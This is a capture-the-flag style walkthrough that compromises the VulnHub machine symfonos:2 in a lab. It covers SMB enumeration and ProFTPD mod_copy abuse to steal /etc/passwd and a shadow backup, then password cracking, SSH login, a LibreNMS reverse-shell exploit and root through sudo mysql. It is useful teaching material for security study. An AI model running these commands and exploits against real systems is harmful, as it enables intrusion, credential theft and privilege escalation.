Details
This machine is https://www.vulnhub.com/entry/symfonos-2,331/
Recon Phase
First a host discovery scan
root@kali:~# nmap -sn 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 05:38 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00019s latency).
MAC Address: 0A:00:27:00:00:0D (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00031s latency).
MAC Address: 08:00:27:25:FE:10 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.00030s latency).
MAC Address: 08:00:27:DC:F6:83 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.56 secondsThen a service discovery scan
root@kali:~# nmap -sV -p- 192.168.56.103
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 05:38 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.000087s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http WebFS httpd 1.21
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:DC:F6:83 (Oracle VirtualBox virtual NIC)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.16 secondsShell Hunting
root@kali:~# smbmap -H 192.168.56.103
[+] Finding open SMB ports....
[+] Guest SMB session established on 192.168.56.103...
[+] IP: 192.168.56.103:445 Name: 192.168.56.103
Disk Permissions
---- -----------
print$ NO ACCESS
anonymous READ ONLY
IPC$ NO ACCESSSo I try to mount it
root@kali:~# mount -v //192.168.56.103/anonymous /tmp/mounted
Password for root@//192.168.56.103/anonymous: I just hit enter
mount.cifs kernel mount options: ip=192.168.56.103,unc=\\192.168.56.103\anonymous,user=root,pass=********And I got to check it
root@kali:~# cd /tmp/mounted
root@kali:/tmp/mounted# ls -la
drwxr-xr-x 2 root root 0 Jul 18 10:30 .
drwxrwxrwt 14 root root 12288 Aug 24 05:42 ..
drwxr-xr-x 2 root root 0 Jul 18 10:25 backups
root@kali:/tmp/mounted# cd backups/
root@kali:/tmp/mounted/backups# ls -la
drwxr-xr-x 2 root root 0 Jul 18 10:25 .
drwxr-xr-x 2 root root 0 Jul 18 10:30 ..
-rwxr-xr-x 1 root root 11394 Jul 18 10:25 log.txt
root@kali:/tmp/mounted/backups# cat log.txt
[SNIP]This contained some interesting things
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
[SNIP]
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
[SNIP]
User aeolus
Group aeolus
[SNIP]This leaked some info, a user called aeolus, a backup shadow file and the location of the share on disk. So I checked the webserver next, http://192.168.56.103
This led me back to a potential ftp exploit, CVE-2015-3306 https://www.exploit-db.com/exploits/36803, the example exploit didn’t work, so I decided to test it manually
root@kali:~# ftp 192.168.56.103
Connected to 192.168.56.103.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.103]
Name (192.168.56.103:root): Entered
anonymous
331 Anonymous login ok, send your complete email address as your password
Password:Just hit enter
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> So I test copying the passwd file to the web server
ftp> site cpfr /etc/passwd
350 File or directory exists, ready for destination name
ftp> site cpto /var/www/html/test.php
550 cpto: Permission deniedThe copy failed, that’s why the exploit didn’t work. But I can also read from the samba share, so I’ll see if I can copy things there
ftp> site cpfr /etc/passwd
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/passwd
250 Copy successfulI have the share mounted, so I check it
root@kali:/tmp/mounted# ls -la
drwxr-xr-x 2 root root 0 Aug 25 2019 .
drwxrwxrwt 15 root root 12288 Aug 25 12:06 ..
drwxr-xr-x 2 root root 0 Jul 18 10:25 backups
-rwxr-xr-x 1 root root 1614 Aug 25 2019 passwdSo I also know there is a copy of the shadow file I can steal now
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow
250 Copy successful
root@kali:/tmp/mounted# ls -la
drwxr-xr-x 2 root root 0 Aug 25 2019 .
drwxrwxrwt 15 root root 12288 Aug 25 12:06 ..
drwxr-xr-x 2 root root 0 Jul 18 10:25 backups
-rwxr-xr-x 1 root root 1614 Aug 25 2019 passwd
-rwxr-xr-x 1 root root 1173 Aug 25 2019 shadowSo I’ll set john on the shadow to crack the passwords
root@kali:~# john shadow --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sergioteamo (aeolus)So I’ll try it on ssh
root@kali:~# ssh [email protected]
aeolus@symfonos2:~$ Root Hunting
So I have a shell, and I dug around for a bit
aeolus@symfonos2:~$ ss -lt
State Recv-Q Send-Q Local
[SNIP]
LISTEN 0 128 127.0.0.1:http-alt *:*
[SNIP]There is another webserver on port 8080 only listening on localhost, I can forward it out with socat
aeolus@symfonos2:/opt$ socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.0.1:8080 &Off to check it http://192.168.56.103:8888
I logged in using
aeolus:sergioteamo
I found an exploit on exploitdb https://www.exploit-db.com/raw/47044, so I set a listener
root@kali:~# nc -nlvp 4444
root@kali:~# python ./exploit.py http://192.168.56.103:8888 "librenms_session=eyJpdiI6Iko3bmd6dUdDZFpvOXMzUUl5NFwvTnRRPT0iLCJ2YWx1ZSI6InNJVExyM0lCZ2Q4NThBUklPRk5xRlRaVXNlNzA3SW9wUE9WdmMreDNoWUk2SzdpYmVIcXozR1NUZVF4SmxJXC95RGtDczdiSkpPR3EwaUxzQ1BzQUtlQT09IiwibWFjIjoiNTkxZjljZDllN2MwNGRkMzhlOGI1Y2U0ZTRmNGI5NDc1M2QyYmZjM2I0NjI1OGY4YzQwZjdiMTRlMTIzYjJmZCJ9;XSRF-TOKEN=eyJpdiI6IndJZlhhck5pZlc0R2JuY0FHRklmXC93PT0iLCJ2YWx1ZSI6IkNuYlVVTitCM3ErWmFlMTc2dnlVXC9RTCtHUnE2Q1p2SGFEZjhURUtpTys3Qkh0TkZTOUd5K1ZncEdlUGRnZUo1K0JjVVFMZ0lNVXJQaUdIbU9ncE91dz09IiwibWFjIjoiNWVjNDAxNDFmOGU1NGE3MDBlNTQ3OTQwZWM0ODk0ZGM0ZTllMGFmNmQ4NDYzZjE5ZTZlNjhkZGZmYTk0YTBjNyJ9;PHPSESSID=jiiebm82elga5cggvne8tisvm7" 192.168.56.101 4444
[+] Device Created SucssfullyIn the listener
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 53862
/bin/sh: 0: can't access tty; job control turned off
$A new shell
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
$ python -c "import pty;pty.spawn('/bin/bash')"
cronus@symfonos2:/opt/librenms/html$
cronus@symfonos2:/home/cronus$ sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysqlI can pop a shell with this
cronus@symfonos2:/home/cronus$ sudo mysql -e '\! /bin/sh'
# A new shell popped
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -la
drwx------ 4 root root 4096 Jul 18 12:13 .
drwxr-xr-x 22 root root 4096 Jul 18 02:31 ..
lrwxrwxrwx 1 root root 9 Jul 18 07:52 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Jul 18 06:58 .config
drwxr-xr-x 3 root root 4096 Jul 18 06:58 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1444 Jul 18 09:36 proof.txt # cat proof.txt
Congrats on rooting symfonos:2!
, ,
,-`{-`/
,-~ , \ {-~~-,
,~ , ,`,-~~-,`,
,` , { { } } }/
; ,--/`\ \ / / }/ /,/
; ,-./ \ \ { { ( /,; ,/ ,/
; / ` } } `, `-`-.___ / `, ,/ `,/
\| ,`,` `~.___,---} / ,`,,/ ,`,;
` { { __ / ,`/ ,`,;
/ \ \ _,`, `{ `,{ `,`;`
{ } } /~\ .-:::-. (--, ;\ `,} `,`;
\\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
`-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
/ , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
/~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
/`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
/` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__
/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \
/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ ``
/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___
/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,
Contact me via Twitter @zayotic to give feedback